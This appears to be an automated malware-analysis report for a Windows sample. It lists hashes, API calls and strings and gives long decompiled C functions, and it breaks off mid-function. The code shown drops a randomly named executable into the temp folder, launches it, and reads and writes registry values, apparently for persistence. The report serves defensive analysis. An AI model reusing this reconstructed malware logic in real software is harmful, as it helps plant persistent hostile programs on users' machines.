Opcode Fuzzy Hash: 317f96d9bc7de3e67904a91eb6120da1bd741d4a36fd8a43a77db32c5f55538a
Instruction Fuzzy Hash: 6BE0BFF5810104FFEB11EBB0EC4EEBB7BBCFB08315F504661B915D6090DAB49A448B64

Uniqueness

Uniqueness Score: -1.00%

Function 0223092B, Relevance: 3.8, Strings: 3, Instructions: 90COMMON

Download Yara Rule

Strings

GetProcAddress., xrefs: 022309DC, 022309DF, 022309E4
l, xrefs: 02230966
., xrefs: 0223095F

Memory Dump Source

Source File: 00000000.00000002.656635661.0000000002230000.00000040.00000001.sdmp, Offset: 02230000, based on PE: false

Yara matches

Similarity

API ID:
String ID: .$GetProcAddress.$l
API String ID: 0-2784972518
Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction ID: b8e3e86e4eb87d186999a2c987f41bb8ceccb0cbd36f8d5e4338391f97e9b442
Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction Fuzzy Hash: F4314CB6910609DFDB21CF99C880AAEBBF5FF48724F15404AD441AB314D7B1EA45CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 0040EBCC, Relevance: 3.0, APIs: 2, Instructions: 13
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040EBCC(long _a4) {
				void* _t3;
				void* _t7;

				_t3 = RtlAllocateHeap(GetProcessHeap(), 0, _a4); // executed
				_t7 = _t3;
				E0040EB74(_t7);
				return _t7;
			}

0x0040ebda
0x0040ebe0
0x0040ebe3
0x0040ebec

APIs

GetProcessHeap.KERNEL32(00000000,00000000,80000001,0040EBFE,7FFF0001,?,0040DB55,7FFF0001), ref: 0040EBD3
RtlAllocateHeap.NTDLL(00000000,?,0040DB55,7FFF0001), ref: 0040EBDA

Part of subcall function 0040EB74: GetProcessHeap.KERNEL32(00000000,00000000,0040EC28,00000000,?,0040DB55,7FFF0001), ref: 0040EB81
Part of subcall function 0040EB74: HeapSize.KERNEL32(00000000,?,0040DB55,7FFF0001), ref: 0040EB88

Memory Dump Source

Source File: 00000000.00000002.656347159.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.656357047.0000000000414000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: Heap$Process$AllocateSize
String ID:
API String ID: 2559512979-0
Opcode ID: ee98881387dc159fbc66546a2e4b1eb81700a9f94495ef156612fafc796680c8
Instruction ID: 42103369b453d960252fa070f8f6fdc0a0ffae9c693debdf4c74a5c852f77059
Opcode Fuzzy Hash: ee98881387dc159fbc66546a2e4b1eb81700a9f94495ef156612fafc796680c8
Instruction Fuzzy Hash: 54C0803210422077C60127A57C0CEDA3E74DF04352F084425F505C1160CB794880879D

Uniqueness

Uniqueness Score: -1.00%

Function 00408328, Relevance: 35.4, APIs: 18, Strings: 2, Instructions: 361
registryCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E00408328(char* __ecx, char __edx) {
				char _v8;
				void* _v12;
				int _v16;
				char _v20;
				intOrPtr _v24;
				int _v28;
				struct _PROCESS_INFORMATION _v44;
				char _v60;
				struct _STARTUPINFOA _v128;
				char _v388;
				char _v427;
				char _v428;
				char _t88;
				char _t89;
				void* _t91;
				char _t93;
				int _t102;
				char _t107;
				intOrPtr _t113;
				char _t116;
				void* _t117;
				signed int _t122;
				char _t126;
				void* _t128;
				char* _t130;
				char _t131;
				char* _t133;
				char _t134;
				char* _t137;
				int _t139;
				char _t144;
				char _t146;
				char* _t147;
				char _t149;
				char _t153;
				intOrPtr* _t154;
				char* _t156;
				char* _t159;
				char _t160;
				char _t165;
				void* _t174;
				signed int _t177;
				char _t180;
				char* _t188;
				int _t189;
				long _t193;
				void* _t195;
				void* _t196;
				void* _t198;
				void* _t199;

				_t181 = __edx;
				_t173 = __ecx;
				_v16 = 0;
				if(E00407DD6(__edx) != 0) {
					return 1;
				}
				_t88 = E00406EC3();
				__eflags = _t88;
				if(_t88 != 0) {
					_v8 = 0;
					__eflags =  *0x412c3c; // 0x0
					if(__eflags == 0) {
						goto L37;
					}
					__eflags =  *0x412c38; // 0x0
					if(__eflags == 0) {
						goto L37;
					}
					_t130 = E00402544(0x4122f8,  &E004106AC, 0x2e, 0xe4, 0xc8);
					_t198 = _t196 + 0x14;
					_t131 = RegOpenKeyExA(0x80000001, _t130, 0, 0x101,  &_v12);
					__eflags = _t131;
					if(_t131 != 0) {
						L31:
						_t133 = E00402544(0x4122f8,  &E004106AC, 0x2e, 0xe4, 0xc8); // executed
						_t198 = _t198 + 0x14;
						_t134 = RegOpenKeyExA(0x80000001, _t133, 0, 0x103,  &_v12);
						__eflags = _t134;
						if(_t134 != 0) {
							L35:
							E0040EE2A(_t173, 0x4122f8, 0, 0x100);
							_t196 = _t198 + 0xc;
							__eflags = _v8;
							if(_v8 != 0) {
								E0040EC2E(_v8);
							}
							goto L37;
						}
						_t188 =  *0x412c3c; // 0x0
						_t137 = _t188;
						_t44 =  &(_t137[1]); // 0x1
						_t173 = _t44;
						do {
							_t181 =  *_t137;
							_t137 =  &(_t137[1]);
							__eflags = _t181;
						} while (_t181 != 0);
						_t139 = _t137 - _t173 + 1;
						__eflags = _t139;
						RegSetValueExA(_v12,  *0x412c38, 0, 1, _t188, _t139);
						RegCloseKey(_v12);
						goto L35;
					}
					_t144 = RegQueryValueExA(_v12,  *0x412c38, 0,  &_v28, 0,  &_v16);
					__eflags = _t144;
					if(_t144 == 0) {
						__eflags = _v28 - 1;
						if(_v28 == 1) {
							__eflags = _v16;
							if(_v16 > 0) {
								_t147 = E0040EBCC(_v16);
								_pop(_t173);
								_v8 = _t147;
								__eflags = _t147;
								if(_t147 != 0) {
									_t173 =  &_v16;
									_t149 = RegQueryValueExA(_v12,  *0x412c38, 0,  &_v28, _t147,  &_v16);
									__eflags = _t149;
									if(_t149 != 0) {
										E0040EC2E(_v8);
										_pop(_t173);
										_v8 = 0;
									}
								}
							}
						}
					}
					RegCloseKey(_v12);
					__eflags = _v8;
					if(_v8 != 0) {
						_t146 = E0040EED1(_v8,  *0x412c3c);
						_pop(_t173);
						__eflags = _t146;
						if(_t146 == 0) {
							goto L35;
						}
					}
					goto L31;
				} else {
					_t153 = E004073FF(_t173, 0x410264, 0, 0,  &_v388,  &_v60);
					_t199 = _t196 + 0x14;
					__eflags = _t153;
					if(_t153 <= 0) {
						L19:
						_t91 = 0;
						L56:
						return _t91;
					}
					__eflags = _v388;
					if(_v388 == 0) {
						goto L19;
					}
					__eflags = _v60;
					if(_v60 == 0) {
						goto L19;
					} else {
						_t154 =  &_v388;
						_t181 = _t154 + 1;
						do {
							_t180 =  *_t154;
							_t154 = _t154 + 1;
							__eflags = _t180;
						} while (_t180 != 0);
						_t156 = _t195 + _t154 - _t181 - 0x181;
						__eflags =  *_t156 - 0x5c;
						if( *_t156 == 0x5c) {
							 *_t156 = 0;
						}
						__eflags =  *0x412159 - 0x60;
						if( *0x412159 < 0x60) {
							L18:
							E0040EE2A(_t180, 0x4122f8, 0, 0x100);
							_t196 = _t199 + 0xc;
							L37:
							_v20 = 0;
							_v8 = 0;
							__eflags =  *0x4121a8; // 0x0
							if(__eflags == 0) {
								L42:
								__eflags =  *0x412cd8; // 0x0
								if(__eflags != 0) {
									L46:
									_t89 = E00406BA7(0x412cd8);
									_pop(_t174);
									__eflags = _t89;
									if(_t89 == 0) {
										L52:
										 *0x412cd8 = 0;
										L53:
										__eflags = _v8;
										if(_v8 != 0) {
											E0040EC2E(_v8);
										}
										_t91 = 1;
										__eflags = 1;
										goto L56;
									}
									_t93 = E00407E2F(_t181);
									__eflags = _t93;
									if(_t93 != 0) {
										L51:
										DeleteFileA(0x412cd8);
										goto L52;
									}
									_t193 = 0x44;
									E0040EE2A(_t174,  &_v128, 0, _t193);
									_v128.cb = _t193;
									E0040EE2A(_t174,  &_v44, 0, 0x10);
									_v428 = 0x22;
									lstrcpyA( &_v427, 0x412cd8);
									_t102 = lstrlenA( &_v428);
									 *((char*)(_t195 + _t102 - 0x1a8)) = 0x22;
									 *((char*)(_t195 + _t102 - 0x1a7)) = 0;
									E00407FCF(_t174);
									_t107 = CreateProcessA(0,  &_v428, 0, 0, 0, 0x8000000, 0, 0,  &_v128,  &_v44);
									__eflags = _t107;
									if(_t107 == 0) {
										E00407EE6(_t174);
										E00407EAD(_t181, __eflags, 0);
										goto L51;
									}
									CloseHandle(_v44.hThread);
									CloseHandle(_v44);
									goto L53;
								}
								GetTempPathA(0x12c, 0x412cd8);
								_t113 = E00408274(0x412cd8);
								_pop(_t177);
								_v24 = _t113;
								_t116 = (E0040ECA5() & 0x00000003) + 5;
								_v20 = _t116;
								__eflags = _t116;
								if(_t116 <= 0) {
									L45:
									_t117 = E00402544(0x4122f8, 0x410694, 5, 0xe4, 0xc8);
									_t69 = _v24 + 0x412cd8; // 0x0
									E0040EF00(_t69, _t117);
									E0040EE2A(_t177, 0x4122f8, 0, 0x100);
									_t196 = _t196 + 0x28;
									goto L46;
								} else {
									goto L44;
								}
								do {
									L44:
									_t122 = E0040ECA5();
									_t177 = 0x1a;
									_t181 = _t122 % _t177 + 0x61;
									_v24 = _v24 + 1;
									_v20 = _v20 - 1;
									 *((char*)(_v24 + 0x412cd8)) = _t122 % _t177 + 0x61;
									__eflags = _v20;
								} while (_v20 > 0);
								goto L45;
							}
							_t126 = E0040675C(0x4121a8,  &_v20, 0);
							_t196 = _t196 + 0xc;
							_v8 = _t126;
							__eflags =  *0x4121a8; // 0x0
							if(__eflags == 0) {
								goto L42;
							}
							__eflags = _t126;
							if(_t126 == 0) {
								goto L42;
							}
							__eflags = _v20 -  *0x4121a4; // 0x0
							if(__eflags != 0) {
								goto L42;
							}
							_t128 = E004024C2(_v8, _t127, 0);
							_t196 = _t196 + 0xc;
							__eflags =  *0x4122d4 - _t128; // 0x0
							if(__eflags == 0) {
								goto L53;
							}
							goto L42;
						}
						_t189 = 4;
						_v8 = 0;
						_v16 = _t189;
						_t159 = E00402544(0x4122f8,  &E00410710, 0x35, 0xe4, 0xc8);
						_t199 = _t199 + 0x14;
						_t160 = RegOpenKeyExA(0x80000002, _t159, 0, 0x103,  &_v12);
						__eflags = _t160;
						if(_t160 != 0) {
							goto L18;
						}
						_t165 = RegQueryValueExA(_v12,  &_v388, 0,  &_v28,  &_v8,  &_v16);
						__eflags = _t165;
						if(_t165 != 0) {
							L16:
							_v8 = 0;
							RegSetValueExA(_v12,  &_v388, 0, _t189,  &_v8, _t189);
							L17:
							RegCloseKey(_v12);
							goto L18;
						}
						__eflags = _v28 - _t189;
						if(_v28 != _t189) {
							goto L16;
						}
						__eflags = _v16 - _t189;
						if(_v16 != _t189) {
							goto L16;
						}
						__eflags = _v8;
						if(_v8 == 0) {
							goto L17;
						}
						goto L16;
					}
				}
			}

0x00408328
0x00408328
0x00408334
0x0040833e
0x00000000
0x00408342
0x0040834a
0x00408354
0x00408356
0x0040846b
0x0040846e
0x00408474
0x00000000
0x00000000
0x0040847a
0x00408480
0x00000000
0x00000000
0x004084a2
0x004084ad
0x004084b6
0x004084b8
0x004084ba
0x00408543
0x0040855f
0x00408564
0x0040856d
0x0040856f
0x00408571
0x004085a5
0x004085ac
0x004085b1
0x004085b4
0x004085b7
0x004085bc
0x004085c1
0x00000000
0x004085b7
0x00408573
0x00408579
0x0040857b
0x0040857b
0x0040857e
0x0040857e
0x00408580
0x00408581
0x00408581
0x00408587
0x00408587
0x00408596
0x0040859f
0x00000000
0x0040859f
0x004084d3
0x004084d9
0x004084db
0x004084dd
0x004084e1
0x004084e3
0x004084e6
0x004084eb
0x004084f0
0x004084f1
0x004084f4
0x004084f6
0x004084f8
0x0040850b
0x00408511
0x00408513
0x00408518
0x0040851d
0x0040851e
0x0040851e
0x00408513
0x004084f6
0x004084e6
0x004084e1
0x00408524
0x0040852a
0x0040852d
0x00408538
0x0040853e
0x0040853f
0x00408541
0x00000000
0x00000000
0x00408541
0x00000000
0x0040835c
0x0040836e
0x00408373
0x00408376
0x00408378
0x00408464
0x00408464
0x00408779
0x00000000
0x0040877a
0x0040837e
0x00408384
0x00000000
0x00000000
0x0040838a
0x0040838d
0x00000000
0x00408393
0x00408393
0x00408399
0x0040839c
0x0040839c
0x0040839e
0x0040839f
0x0040839f
0x004083a5
0x004083ac
0x004083af
0x004083b1
0x004083b1
0x004083b3
0x004083ba
0x00408450
0x00408457
0x0040845c
0x004085c2
0x004085c2
0x004085c5
0x004085c8
0x004085ce
0x00408615
0x0040861a
0x00408620
0x004086a7
0x004086a8
0x004086ad
0x004086ae
0x004086b0
0x00408762
0x00408762
0x00408768
0x00408768
0x0040876b
0x00408770
0x00408775
0x00408778
0x00408778
0x00000000
0x00408778
0x004086b6
0x004086bb
0x004086bd
0x0040875b
0x0040875c
0x00000000
0x0040875c
0x004086c5
0x004086cc
0x004086d8
0x004086db
0x004086eb
0x004086f2
0x004086ff
0x00408705
0x0040870d
0x00408714
0x00408733
0x00408739
0x0040873b
0x0040874f
0x00408755
0x00000000
0x0040875a
0x00408746
0x0040874b
0x00000000
0x0040874b
0x0040862c
0x00408633
0x00408638
0x00408639
0x00408644
0x00408647
0x0040864a
0x0040864c
0x00408671
0x00408683
0x0040868c
0x00408693
0x0040869f
0x004086a4
0x00000000
0x00000000
0x00000000
0x00000000
0x0040864e
0x0040864e
0x0040864e
0x00408657
0x0040865d
0x00408660
0x00408663
0x00408666
0x0040866c
0x0040866c
0x00000000
0x0040864e
0x004085da
0x004085df
0x004085e2
0x004085e5
0x004085eb
0x00000000
0x00000000
0x004085ed
0x004085ef
0x00000000
0x00000000
0x004085f4
0x004085fa
0x00000000
0x00000000
0x00408601
0x00408606
0x00408609
0x0040860f
0x00000000
0x00000000
0x00000000
0x0040860f
0x004083c2
0x004083df
0x004083e2
0x004083e5
0x004083ea
0x004083f3
0x004083f9
0x004083fb
0x00000000
0x00000000
0x00408414
0x0040841a
0x0040841c
0x0040842d
0x0040843e
0x00408441
0x00408447
0x0040844a
0x00000000
0x0040844a
0x0040841e
0x00408421
0x00000000
0x00000000
0x00408423
0x00408426
0x00000000
0x00000000
0x00408428
0x0040842b
0x00000000
0x00000000
0x00000000
0x0040842b
0x0040838d

APIs

RegOpenKeyExA.ADVAPI32(80000002,00000000,?,?,00000000,00000103,Function_00010750,?,?,00000000,localcfg,00000000), ref: 004083F3
RegQueryValueExA.ADVAPI32(00410750,?,00000000,?,00408893,?,?,?,00000000,00000103,Function_00010750,?,?,00000000,localcfg,00000000), ref: 00408414
RegSetValueExA.ADVAPI32(00410750,?,00000000,00000004,00408893,00000004,?,?,00000000,00000103,Function_00010750,?,?,00000000,localcfg,00000000), ref: 00408441
RegCloseKey.ADVAPI32(00410750,?,?,00000000,00000103,Function_00010750,?,?,00000000,localcfg,00000000), ref: 0040844A

Strings

localcfg, xrefs: 00408348
PromptOnSecureDesktop, xrefs: 0040834F, 004083DE, 00408456, 004084A1, 0040855E, 004085AB, 00408682, 0040869E

Memory Dump Source

Source File: 00000000.00000002.656347159.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.656357047.0000000000414000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: Value$CloseOpenQuery
String ID: PromptOnSecureDesktop$localcfg
API String ID: 237177642-1678164370
Opcode ID: c99ebb4dbf947cb7aba4f5f8c52dbba8c4803a07f323f2b0815b9e53b0846c26
Instruction ID: 84ba07e5042139a9063b988de9b3f7486f2cd5d6c0453319c527b22e45c4d953
Opcode Fuzzy Hash: c99ebb4dbf947cb7aba4f5f8c52dbba8c4803a07f323f2b0815b9e53b0846c26
Instruction Fuzzy Hash: DAC1D2B1D00109BEEB11ABA0DE85EEF7BBCEB04304F14447FF544B2191EA794E948B69

Uniqueness

Uniqueness Score: -1.00%

Function 004073FF, Relevance: 23.1, APIs: 11, Strings: 2, Instructions: 345
registryCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E004073FF(void* __ecx, intOrPtr* _a4, signed int* _a8, int** _a12, char* _a16, char* _a20) {
				CHAR* _v8;
				void* _v12;
				int _v16;
				void* _v20;
				int* _v24;
				char* _v28;
				intOrPtr _v32;
				int _v36;
				char _v295;
				char _v296;
				char _v556;
				void _v592;
				intOrPtr* _t85;
				int** _t86;
				char* _t87;
				char* _t88;
				intOrPtr _t89;
				char* _t91;
				long _t92;
				signed int _t93;
				long _t97;
				signed int _t103;
				long _t107;
				char* _t118;
				intOrPtr* _t119;
				CHAR* _t123;
				void* _t125;
				char* _t127;
				intOrPtr* _t134;
				void* _t136;
				intOrPtr _t137;
				signed int* _t146;
				int** _t147;
				void* _t160;
				signed int _t163;
				intOrPtr _t164;
				void* _t165;
				intOrPtr _t167;
				intOrPtr _t172;
				intOrPtr* _t173;
				void* _t186;
				intOrPtr _t187;
				int* _t188;
				void* _t190;
				void* _t191;
				char* _t192;
				signed int _t194;
				int* _t196;
				void* _t202;
				void* _t203;
				void* _t204;
				void* _t206;

				_t165 = __ecx;
				_t85 = _a8;
				_t188 = 0;
				_v16 = 0x104;
				if(_t85 != 0) {
					 *_t85 = 0;
				}
				_t86 = _a12;
				if(_t86 != _t188) {
					 *_t86 = _t188;
				}
				_t87 = _a16;
				if(_t87 != _t188) {
					 *_t87 = 0;
				}
				_t88 = _a20;
				if(_t88 != _t188) {
					 *_t88 = 0; // executed
				}
				_t89 = E00406DC2(_t165); // executed
				_v32 = _t89;
				_t160 = 0xe4;
				_t91 = E00402544(0x4122f8, 0x4106e8, 0x22, 0xe4, 0xc8);
				_t204 = _t203 + 0x14;
				_t92 = RegOpenKeyExA(0x80000002, _t91, _t188, 0x20119,  &_v20); // executed
				_push(0x100);
				_push(_t188);
				_push(0x4122f8);
				if(_t92 != 0) {
					_t93 = E0040EE2A(_t165);
					goto L66;
				} else {
					E0040EE2A(_t165);
					_t206 = _t204 + 0xc;
					_push(_v16);
					_push( &_v556);
					_v24 = _t188;
					_push(_t188);
					while(1) {
						_t97 = RegEnumKeyA(_v20, ??, ??, ??); // executed
						if(_t97 != 0) {
							break;
						}
						if(E00406CAD( &_v556) == 0) {
							L41:
							_v24 =  &(_v24[0]);
							_push(0x104);
							_v16 = 0x104;
							_push( &_v556);
							_push(_v24);
							continue;
						}
						_t103 = E0040F1A5( &_v556);
						_pop(_t167);
						if((_t103 ^ 0x5e5e5e5e) != _v32) {
							goto L41;
						}
						_v12 = _t188;
						_v16 = 0x104;
						_t107 = RegOpenKeyExA(_v20,  &_v556, _t188, 0x101,  &_v12);
						if(_t107 != _t188) {
							L45:
							if(_t107 != 5) {
								L50:
								E0040EE2A(_t167, 0x4122f8, _t188, 0x100);
								_t206 = _t206 + 0xc;
								L39:
								if(_v12 != _t188) {
									RegCloseKey(_v12);
								}
								goto L41;
							}
							E0040EF00(_a16,  &_v556);
							if(_v12 != _t188) {
								RegCloseKey(_v12);
							}
							_push(4);
							_pop(0);
							L64:
							RegCloseKey(_v20);
							return 0;
						}
						_t118 = E00402544(0x4122f8, 0x4106dc, 0xa, _t160, 0xc8);
						_t206 = _t206 + 0x14;
						_t107 = RegQueryValueExA(_v12, _t118, _t188,  &_v36,  &_v296,  &_v16);
						if(_t107 != _t188) {
							goto L45;
						}
						_t119 =  &_v556;
						_t186 = _t119 + 1;
						do {
							_t167 =  *_t119;
							_t119 = _t119 + 1;
						} while (_t167 != 0);
						if(_v16 <= _t119 - _t186) {
							goto L50;
						}
						_t123 = E0040EE95( &_v296,  &_v556);
						_pop(_t167);
						_v8 = _t123;
						if(_t123 == _t188) {
							goto L50;
						}
						_t125 = E0040EE95(_v8, E00402544(0x4122f8, 0x410694, 5, _t160, 0xc8));
						_t206 = _t206 + 0x1c;
						if(_t125 == 0) {
							_t188 = 0;
							goto L50;
						}
						if(_v296 != 0x22) {
							_t127 = E0040ED03( &_v296, 0x20);
							_pop(_t167);
						} else {
							E0040EF00( &_v296,  &_v295);
							_t127 = E0040ED03( &_v296, 0x22);
							_t206 = _t206 + 0x10;
						}
						if(_t127 != 0) {
							 *_t127 = 0;
						}
						_v8 = E0040EE95( &_v296,  &_v556);
						_v28 = E0040EE95(_v8, E00402544(0x4122f8, 0x410694, 5, _t160, 0xc8));
						E0040EE2A(_t167, 0x4122f8, 0, 0x100);
						_t134 = _a4;
						_t206 = _t206 + 0x30;
						_t190 = _t134 + 1;
						do {
							_t172 =  *_t134;
							_t134 = _t134 + 1;
						} while (_t172 != 0);
						_t173 = _v8;
						_t191 = _t134 - _t190;
						_t43 = _t173 + 1; // 0x1
						_t136 = _t43;
						do {
							_t187 =  *_t173;
							_t173 = _t173 + 1;
						} while (_t187 != 0);
						_t174 = _t173 - _t136;
						if(_t191 <= _t173 - _t136 || E0040ED77(_t191 - _t174 + _a4, _v8) != 0) {
							_t192 = _v28;
							 *_t192 = 0;
							_t137 = E0040ED23(_v8, 0x5c);
							_v8 = _t137;
							if(_t137 != 0) {
								_v8 = _v8 + 1;
							} else {
								_v8 =  &_v296;
							}
							if(E00406CAD(_v8) == 0) {
								 *_t192 = 0x2e;
								goto L38;
							} else {
								_t194 = E0040F1A5(_v8) ^ 0x5e5e5e5e;
								_t163 = _t194 >> 0x00000008 & 0x000000ff;
								 *_v28 = 0x2e;
								if(E00406C96(_t194) != 0) {
									L37:
									_t160 = 0xe4;
									L38:
									_t188 = 0;
									goto L39;
								}
								_t56 = _t163 - 0x51; // -81
								if(_t56 > 0x2e || (_t194 & 0x000000ff) >= 0x10) {
									goto L37;
								} else {
									_t196 = 0;
									if(GetFileAttributesExA( &_v296, 0,  &_v592) != 0) {
										_t196 = 1;
									}
									_t146 = _a8;
									if(_t146 != 0) {
										 *_t146 = _t163;
									}
									_t164 = _a16;
									if(_t164 != 0) {
										_t202 = _v8 -  &_v296;
										E0040EE08(_t164,  &_v296, _t202);
										 *((char*)(_t202 + _t164)) = 0;
									}
									if(_a20 != 0) {
										E0040EF00(_a20, _v8);
									}
									_t147 = _a12;
									if(_t147 != 0) {
										 *_t147 = _t196;
									}
									_push(3);
									_pop(0);
									goto L63;
								}
							}
						} else {
							E0040EF00(_a16,  &_v556);
							L63:
							RegCloseKey(_v12);
							goto L64;
						}
					}
					_t93 = RegCloseKey(_v20); // executed
					L66:
					return _t93 | 0xffffffff;
				}
			}

0x004073ff
0x00407408
0x0040740e
0x00407410
0x00407419
0x0040741b
0x0040741b
0x0040741d
0x00407422
0x00407424
0x00407424
0x00407426
0x0040742b
0x0040742d
0x0040742d
0x00407430
0x00407435
0x00407437
0x00407437
0x0040743a
0x0040743f
0x00407451
0x00407464
0x00407469
0x00407472
0x00407478
0x0040747d
0x0040747e
0x00407481
0x004077f9
0x00000000
0x00407487
0x00407487
0x0040748c
0x0040748f
0x00407498
0x00407499
0x0040749c
0x00407703
0x00407706
0x0040770e
0x00000000
0x00000000
0x004074b1
0x004076ed
0x004076ed
0x004076f5
0x004076f6
0x004076ff
0x00407700
0x00000000
0x00407700
0x004074be
0x004074c8
0x004074cc
0x00000000
0x00000000
0x004074e6
0x004074e9
0x004074f0
0x004074f8
0x00407727
0x0040772a
0x00407755
0x0040775c
0x00407761
0x004076df
0x004076e2
0x004076e7
0x004076e7
0x00000000
0x004076e2
0x00407736
0x00407740
0x00407745
0x00407745
0x0040774b
0x0040774d
0x004077ec
0x004077ef
0x00000000
0x004077f5
0x0040751c
0x00407521
0x00407528
0x00407530
0x00000000
0x00000000
0x00407536
0x0040753c
0x0040753f
0x0040753f
0x00407541
0x00407542
0x0040754b
0x00000000
0x00000000
0x0040755f
0x00407565
0x00407566
0x0040756b
0x00000000
0x00000000
0x00407589
0x0040758e
0x00407593
0x00407753
0x00000000
0x00407753
0x004075a0
0x004075d1
0x004075d7
0x004075a2
0x004075b0
0x004075be
0x004075c3
0x004075c3
0x004075da
0x004075dc
0x004075dc
0x004075fc
0x00407615
0x00407618
0x0040761d
0x00407620
0x00407623
0x00407626
0x00407626
0x00407628
0x00407629
0x0040762d
0x00407632
0x00407634
0x00407634
0x00407637
0x00407637
0x00407639
0x0040763a
0x0040763e
0x00407642
0x0040765c
0x00407664
0x00407667
0x0040766e
0x00407673
0x00407680
0x00407675
0x0040767b
0x0040767b
0x0040768e
0x00407722
0x00000000
0x00407694
0x004076a1
0x004076ad
0x004076b3
0x004076bf
0x004076d8
0x004076d8
0x004076dd
0x004076dd
0x00000000
0x004076dd
0x004076c1
0x004076c7
0x00000000
0x0040777e
0x00407785
0x00407797
0x00407799
0x00407799
0x0040779a
0x0040779f
0x004077a1
0x004077a1
0x004077a3
0x004077a8
0x004077b3
0x004077b8
0x004077c0
0x004077c0
0x004077c8
0x004077d0
0x004077d6
0x004077d7
0x004077dc
0x004077de
0x004077de
0x004077e0
0x004077e2
0x00000000
0x004077e2
0x004076c7
0x00407769
0x00407773
0x004077e3
0x004077e6
0x00000000
0x004077e6
0x00407642
0x00407717
0x00407801
0x00000000
0x00407801

APIs

RegOpenKeyExA.KERNELBASE(80000002,00000000,00020119,00000000,?,73B743E0,00000000), ref: 00407472
RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00000101,?,?,?,?,?,?,?,73B743E0,00000000), ref: 004074F0
RegQueryValueExA.ADVAPI32(?,00000000,?,00000000,?,?,00000104,?,?,?,?,?,?,73B743E0,00000000), ref: 00407528
___ascii_stricmp.LIBCMT ref: 0040764D
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,73B743E0,00000000), ref: 004076E7
RegEnumKeyA.ADVAPI32(00000000,00000000,?,00000104), ref: 00407706
RegCloseKey.KERNELBASE(00000000,?,?,?,?,?,?,73B743E0,00000000), ref: 00407717
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,73B743E0,00000000), ref: 00407745
RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,73B743E0,00000000), ref: 004077EF

Part of subcall function 0040F1A5: lstrlenA.KERNEL32(000000C8,000000E4,PromptOnSecureDesktop,000000C8,00407150,?), ref: 0040F1AD

GetFileAttributesExA.KERNEL32(00000022,00000000,?), ref: 0040778F
RegCloseKey.ADVAPI32(?), ref: 004077E6

Strings

PromptOnSecureDesktop, xrefs: 0040745E, 00407463, 0040747E, 0040751B, 0040757F, 004075FB, 00407614, 0040775B
", xrefs: 00407599

Memory Dump Source

Source File: 00000000.00000002.656347159.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.656357047.0000000000414000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: Close$Open$AttributesEnumFileQueryValue___ascii_stricmplstrlen
String ID: "$PromptOnSecureDesktop
API String ID: 3433985886-3108538426
Opcode ID: f6ba5331e6759a7c13200e1095f170a5ecf38920a0726b355cc9583edcbb1e75
Instruction ID: 2be8177c38fcb0431c37abdcb30432b02610efeff0693f38a05b2573c300e2d4
Opcode Fuzzy Hash: f6ba5331e6759a7c13200e1095f170a5ecf38920a0726b355cc9583edcbb1e75
Instruction Fuzzy Hash: E8C1F171D04209ABEB119BA5DC45BEF7BB9EF04310F1004B7F504B72D1EA79AE908B69

Uniqueness

Uniqueness Score: -1.00%

Function 0040704C, Relevance: 23.1, APIs: 10, Strings: 3, Instructions: 332
registryCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E0040704C(intOrPtr _a4, signed int* _a8, int _a12, int _a16, int* _a20) {
				CHAR* _v8;
				void* _v12;
				signed int _v16;
				int _v20;
				char _v24;
				char _v28;
				signed int _v32;
				char _v64;
				char _v363;
				char _v364;
				void _v400;
				intOrPtr* _t88;
				int* _t89;
				int* _t90;
				int* _t91;
				char* _t93;
				long _t94;
				signed int _t96;
				signed int _t97;
				long _t99;
				signed int _t107;
				int _t109;
				int _t119;
				int _t121;
				int _t122;
				int _t123;
				signed int _t125;
				signed int* _t130;
				int _t136;
				int _t149;
				int _t155;
				void* _t158;
				signed int _t166;
				int _t196;
				signed int _t204;
				int _t206;
				void* _t207;
				void* _t208;
				void* _t210;
				void* _t211;

				_t88 = _a8;
				_t167 = 0;
				_v16 = 0x12c;
				_v24 = 0x20;
				_v364 = 0;
				if(_t88 != 0) {
					 *_t88 = 0;
				}
				_t89 = _a12;
				if(_t89 != _t167) {
					 *_t89 = _t167;
				}
				_t90 = _a16;
				if(_t90 != _t167) {
					 *_t90 = _t167;
				}
				_t91 = _a20;
				if(_t91 != _t167) {
					 *_t91 = _t167;
				}
				_t93 = E00402544(0x4122f8,  &E004106AC, 0x2e, 0xe4, 0xc8);
				_t208 = _t207 + 0x14;
				_t94 = RegOpenKeyExA(0x80000001, _t93, _t167, 0x101,  &_v12); // executed
				if(_t94 != 0) {
					L21:
					_t96 = E0040EE2A(_t167, 0x4122f8, 0, 0x100) | 0xffffffff;
					goto L22;
				} else {
					_t97 = E00406DC2(_t167);
					_push( &_v16);
					_push( &_v364);
					_push( &_v28);
					_v32 = _t97;
					_push(0);
					_push( &_v24);
					_t167 =  &_v64;
					_push( &_v64);
					_v8 = 0;
					_push(0);
					while(1) {
						_t99 = RegEnumValueA(_v12, ??, ??, ??, ??, ??, ??, ??); // executed
						if(_t99 == 0x103) {
							break;
						}
						__eflags = _t99;
						if(_t99 != 0) {
							L18:
							_t25 =  &_v8;
							 *_t25 =  &(_v8[1]);
							__eflags =  *_t25;
							_push( &_v16);
							_push( &_v364);
							_push( &_v28);
							_push(0);
							_push( &_v24);
							_push( &_v64);
							_push(_v8);
							_v16 = 0x12c;
							_v24 = 0x20;
							continue;
						}
						__eflags = _v24 - _t99;
						if(_v24 <= _t99) {
							goto L18;
						}
						__eflags = _v16 - _t99;
						if(_v16 <= _t99) {
							goto L18;
						}
						__eflags = _v28 - 1;
						if(_v28 != 1) {
							goto L18;
						}
